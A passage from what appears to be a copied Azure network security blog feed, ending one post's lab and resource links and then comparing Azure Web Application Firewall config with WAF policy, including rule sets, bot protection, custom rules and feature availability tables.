automation as packaged content. This enables you to find the appropriate solution easily and then deploy all the components in the solution in a single step from the Solutions blade in Azure Sentinel.</P> <P>In <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-hunting-queries-and-response-automation-in-azure/ba-p/2688746" target="_blank" rel="noopener">this blog post</A>, we cover in further detail how automate detections and response for Azure Firewall events using Azure Sentinel.</P> <P>&nbsp;</P> <H1>5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Hands-on Labs</H1> <P>&nbsp;</P> <P>Network Security Demo lab: Azure pre-configured test deployment kit for POC is available in <A href="#" target="_blank" rel="noopener">this repository</A>. &nbsp;You can use this lab to validate Proof of Concepts for the different <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-proof-of-concept-part-2-deploying-the/ba-p/1773168" target="_blank" rel="noopener">Network</A> security products. You can find more information on set up and demo in the NetSec POC blogpost<BR /><BR /></P> <P><STRONG>WAF Attack test lab</STRONG>: Set up a Web Application Firewall lab environment to verify how you can identify, detect and protect against suspicious activities in your environment. This <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-1-lab-setup-azure-waf-security-protection-and-detection-lab/ba-p/2030469" target="_blank" rel="noopener">blogpost</A> provides steps to protect against potential attacks and you can <A href="#" target="_blank" rel="noopener">deploy the template from Github</A>.</P> <P>&nbsp;</P> <P><STRONG>Interactive Guide:</STRONG> If you cannot set up a lab environment, you can still get a hands-on experience with our&nbsp;<A href="#" target="_self">Azure network security interactive guide</A>. In this guide, we will show you how you can protect your cloud infrastructure with Azure network security tools.</P> <P>&nbsp;</P> <H1>6&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Resource References</H1> <P>&nbsp;</P> <P>Register for upcoming webinars or watch recordings of past webinars in our Microsoft Security Community!</P> <UL> <LI><A href="#" target="_blank" rel="noopener">https://aka.ms/SecurityWebinars</A></LI> </UL> <P>Check out and be sure to contribute with our Azure Network Security samples in GitHub!</P> <UL> <LI><A href="#" target="_blank" rel="noopener">http://aka.ms/aznetsec</A></LI> </UL> <P>Check out our Azure Network Security blog posts in our Tech Community!</P> <UL> <LI><A href="#" target="_blank" rel="noopener">http://aka.ms/aznetsecblog</A></LI> </UL> <P>Provide feedback and ideas about Azure products and features in our Azure Feedback portal!</P> <UL> <LI><A href="#" target="_blank" rel="noopener">http://aka.ms/azurefeedback</A></LI> </UL> <P>&nbsp;</P> Wed, 06 Oct 2021 17:30:47 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-ninja-training/ba-p/2356101 camilamartins 2021-10-06T17:30:47Z Azure Web Application Firewall: WAF config versus WAF policy https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-web-application-firewall-waf-config-versus-waf-policy/ba-p/2270525 <P><STRONG><SPAN style="font-family: Calibri, sans-serif; font-size: 20px;">What is Web Application Firewall (WAF) config?</SPAN></STRONG></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">WAF config is the built-in method to configure WAF on Azure Application Gateway, and it is local to each individual Azure Application Gateway resource. When you create an Azure Application Gateway with either the WAF or the WAF_v2 SKU, you will see a new item on the menu blade called "Web application firewall" that displays WAF configuration options.&nbsp;</SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">The biggest drawback of using WAF config is that not all WAF settings are displayed in the portal UI. For example, you cannot configure or manage custom rules in the portal: you must use PowerShell or Azure CLI for that. Additionally, WAF config is a setting within an Azure Application Gateway resource. For this reason, each WAF config must be managed individually, and its configuration applies globally for everything within that specific Azure Application Gateway resource. WAF config does not exist on Azure Front Door.</SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG><EM>Image:</EM></STRONG><EM>&nbsp;WAF config on Azure Application Gateway</EM></SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><EM><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="wafconfig.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/272525i67CB96478E353891/image-size/large?v=v2&amp;px=999" role="button" title="wafconfig.png" alt="wafconfig.png" /></span></EM></SPAN></SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN style="font-size: 20px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>What is WAF policy?</STRONG></SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">WAF policy is a standalone resource type. It is not a built-in configuration within the Azure Application Gateway resource. A WAF policy is managed independently, and it can be attached to either Azure Application Gateway or Azure Front Door resources. When checking the "Web application firewall" option on the menu blade for Azure Application Gateway or Azure Front Door, you will notice that it simply displays a link to the attached WAF policy, rather than the full WAF configuration settings.&nbsp;</SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-family: Calibri, sans-serif; font-size: 17px;">A benefit of using WAF policy for Azure Application Gateway or Azure Front Door is that all generally available WAF settings exist in the portal UI, such as exclusions, custom rules, managed rules and more. You can configure and visualize the WAF policy settings in the portal, in addition to PowerShell and Azure CLI. Another useful benefit of WAF policy when it comes to Azure Application Gateway is that it offers more granularity in scope. You can associate a WAF policy at a global level by assigning it to an Azure Application Gateway resource, at a website level by assigning it to an HTTP listener, or even at a URI level by assigning it to a specific route path. For example, you could use a global WAF policy to apply the baseline security controls that meet your organization's security policy and attach it to all your Azure Application Gateways. From there, based on individual application needs, you can apply a different WAF policy that contains more (or less) strict security controls at a website level or at a URI level.</SPAN></P> <P>&nbsp;</P> <BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><EM>Would you like more information on different WAF policy association levels for Azure Application Gateway? Refer to our <A href="#" target="_blank" rel="noopener">Azure Web Application Firewall (WAF) policy overview</A> documentation.</EM></SPAN></SPAN></P> </BLOCKQUOTE> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG><EM>Image:</EM></STRONG><EM>&nbsp;WAF policy on Azure Application Gateway</EM></SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><EM><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="wafpolappgw.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/272526i0DF5AF211139791E/image-size/large?v=v2&amp;px=999" role="button" title="wafpolappgw.png" alt="wafpolappgw.png" /></span></EM></SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG><EM>Image:</EM></STRONG><EM>&nbsp;WAF policy on Azure Front Door</EM></SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><span class="lia-inline-image-display-wrapper lia-image-align-left" image-alt="wafpolafd.png" style="width: 995px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/272527i47AC90EBE21462DE/image-size/large?v=v2&amp;px=999" role="button" title="wafpolafd.png" alt="wafpolafd.png" /></span>&nbsp;</SPAN></SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><SPAN style="font-size: 20px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>What types of rules are available in Azure WAF?</STRONG></SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 18px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>1. Azure-managed rule sets</STRONG></SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">The Azure-managed rulesets for Azure WAF on Azure Application Gateway and Azure Front Door are based on <A href="#" target="_blank" rel="noopener">OWASP ModSecurity Core Rule Set (CRS)</A>. This set of rules protect your web applications against most top 10 OWASP web application security threats, such as SQL injection and cross-site scripting.&nbsp;</SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">When using Azure WAF with Azure Application Gateway, you will see the managed rule sets represented as OWASP_3.2 (Preview), OWASP_3.1, OWASP_3.0, and OWASP_2.2.9. Here, the Azure WAF uses the <A href="#" target="_blank" rel="noopener">anomaly scoring mode</A>, which &nbsp;means all rules in these rule sets are evaluated for each request, and the request is only blocked when the anomaly scoring threshold is reached.</SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">When using Azure WAF with Azure Front Door, you will see the managed rule sets represented as Microsoft_DefaultRuleSet_1.1 and DefaultRuleSet_1.0. The Microsoft_DefaultRuleSet_1.1 rule set includes Microsoft-authored rules in addition to the rules based on OWASP ModSecurity CRS. In this case, Azure WAF uses the traditional mode, which means that as soon as there is a rule match the WAF stops processing all other subsequent rules.</SPAN></SPAN></P> <P>&nbsp;</P> <BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">More information on <A href="#" target="_blank" rel="noopener">Azure-managed rule sets for Azure WAF on Azure Application Gateway</A>&nbsp;</SPAN></SPAN></P> </BLOCKQUOTE> <BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">More information on <A href="#" target="_blank" rel="noopener">Azure-managed rule sets for Azure WAF on Azure Front Door</A></SPAN></SPAN></P> </BLOCKQUOTE> <P>&nbsp;</P> <P><SPAN style="font-size: 18px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>2. Bot protection rule sets</STRONG></SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Bot protection rule sets provide safety against bots doing scraping, scanning, and looking for vulnerabilities in your web application. These rule sets are powered by our own Microsoft Threat Intelligence feed, which is used by multiple Azure services, including Azure Firewall and Azure Security Center.&nbsp;</SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">When using Azure WAF with Azure Application Gateway, you will see the bot protection rule set represented as Microsoft_BotManagerRuleSet_0.1. This rule set can detect known bad bots based on IP reputation.&nbsp;</SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">When using Azure WAF with Azure Front Door, you will see the bot protection rule set represented as Microsoft_BotManagerRuleSet_1.0. This rule set can detect bad bots, good bots, and unknown bots based on IP reputation, user-agent headers, and other indicators that compose signatures managed by Microsoft.</SPAN></SPAN></P> <P>&nbsp;</P> <BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">More information on <A href="#" target="_blank" rel="noopener">Bot protection rule set for Azure WAF on Azure Application Gateway</A></SPAN></SPAN></P> </BLOCKQUOTE> <BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">More information on <A href="#" target="_blank" rel="noopener">Bot protection rule sets for Azure WAF on Azure Front Door</A></SPAN></SPAN></P> </BLOCKQUOTE> <P>&nbsp;</P> <P><SPAN style="font-size: 18px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>3. Custom rules</STRONG></SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Azure WAF provides the ability to create custom rules. This allows you to either fine-tune your WAF policy or create rules with specific logic to address your unique application requirements. The rule conditions can be based on many variables, such as IPs, geolocation, request URIs, post arguments, and more. Custom rules can trigger based on a simple match for Azure WAF on Azure Application Gateway and Azure Front Door, or additionally, they can trigger based on rate-limiting thresholds for Azure WAF on Azure Front Door.</SPAN></SPAN></P> <P>&nbsp;</P> <BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">If you’d like to see some WAF custom rule examples, check out our blog post on <A href="#" target="_blank" rel="noopener">Azure WAF Custom Rule Samples and Use Cases</A></SPAN></SPAN></P> </BLOCKQUOTE> <BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">More information on <A href="#" target="_blank" rel="noopener">Custom rules for Azure WAF on Azure Application Gateway</A></SPAN></SPAN></P> </BLOCKQUOTE> <BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">More information on <A href="#" target="_blank" rel="noopener">Custom rules for Azure WAF on Azure Front Door</A></SPAN></SPAN></P> </BLOCKQUOTE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">&nbsp;</SPAN></SPAN></P> <P><SPAN style="font-size: 20px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>What are the feature distinctions between WAF config and WAF policy?</STRONG></SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">As you can see based on the information we have shared this far, there are a few important differences between the capabilities of WAF depending on the associated resource type. You can consult these tables to get a quick comparison and make an informed decision when deploying Azure WAF.</SPAN></SPAN></P> <P>&nbsp;</P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">In the table below, we’re sharing the feature availability on WAF config for Azure Application Gateway WAF and WAF_v2 SKUs.</SPAN></SPAN></P> <P>&nbsp;</P> <TABLE style="width: 100.0%; border-collapse: collapse;"> <TBODY> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>WAF Config Features</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border: solid black 1.0pt; border-left: none; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>WAF SKU</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border: solid black 1.0pt; border-left: none; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>WAF_v2 SKU</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>OWASP_3.2 (Preview)</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>OWASP_3.1</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>OWASP_3.0</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>OWASP_2.2.9</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Microsoft_BotManagerRuleSet_0.1</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Geo-Location Rules</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in; height: 22.5pt;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Per-Site Policy&nbsp;</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 58.18%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Per-Uri Policy&nbsp;</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.42%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> <TD style="width: 21.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> </TBODY> </TABLE> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">&nbsp;</SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">In the table below, we are detailing the feature availability on WAF policy for Azure Application Gateway WAF_v2 and Azure Front Door. Note that WAF policy cannot be used with Azure Application Gateway WAF SKU.</SPAN></SPAN></P> <P>&nbsp;</P> <TABLE style="width: 100.0%; border-collapse: collapse;"> <TBODY> <TR> <TD style="width: 46.86%; border: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>WAF Policy&nbsp;Features</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 32.38%; border: solid black 1.0pt; border-left: none; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Azure Application Gateway (WAF_v2 SKU)</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.76%; border: solid black 1.0pt; border-left: none; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Azure Front Door</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 46.86%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>OWASP-Based Rule Set</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 32.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.76%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 46.86%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Microsoft-Authored Rule Set</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 32.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> <TD style="width: 20.76%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 46.86%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Bot Protection Rule Set</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 32.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.76%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 46.86%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Custom Rules with Geo-Location&nbsp;support</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 32.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.76%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 46.86%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Custom Rules with Rate-Limiting support</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 32.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> <TD style="width: 20.76%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 46.86%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Per-Website WAF Policy&nbsp;</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 32.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.76%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 46.86%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Per-URI WAF Policy&nbsp;</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 32.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.76%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> </TR> </TBODY> </TABLE> <P><SPAN style="font-size: 20px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>&nbsp;</STRONG></SPAN></SPAN></P> <P><SPAN style="font-size: 20px;"><STRONG><SPAN style="font-family: Calibri, sans-serif;">Are there other key differences worth mentioning?</SPAN></STRONG></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Here are a few more things to consider:</SPAN></SPAN></P> <P>&nbsp;</P> <UL> <LI><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Rule actions for custom rules:</STRONG> In a WAF policy 